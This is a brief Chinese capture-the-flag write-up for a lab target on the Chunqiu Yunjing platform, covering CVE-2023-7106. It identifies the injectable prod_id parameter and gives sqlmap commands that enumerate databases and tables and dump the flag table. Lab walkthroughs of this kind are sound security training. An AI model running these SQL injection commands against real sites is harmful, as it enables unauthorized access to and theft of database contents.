本文主要是介绍【春秋云镜】CVE-2023-7106标靶Wp,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
0x01:漏洞点
老样子先,看看标题介绍奥
ok了解到了 我们现在要知道参数是prod_id,路径为/pages/product_details.php
0x02:操作
直接打开SQLmap一把梭
sqlmap -u {URL}/pages/product_details.php?prod_id=1 --current-db
这里的是查看数据库,奥
这里的话当前库是MySQL,后面实际测的时候那个库在electricks里面
sqlmap -u {URL}/pages/product_details.php?prod_id=1 --dbs
这串就是查询库名
然后直接查询表
sqlmap -u {URL}/pages/product_details.php?prod_id=1 -D electricks --tables
直接爆出来吧我的Flag!!!!!
sqlmap -u {URL}/pages/product_details.php?prod_id=1 -D electricks -T flllaaaag --dump
这篇关于【春秋云镜】CVE-2023-7106标靶Wp的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!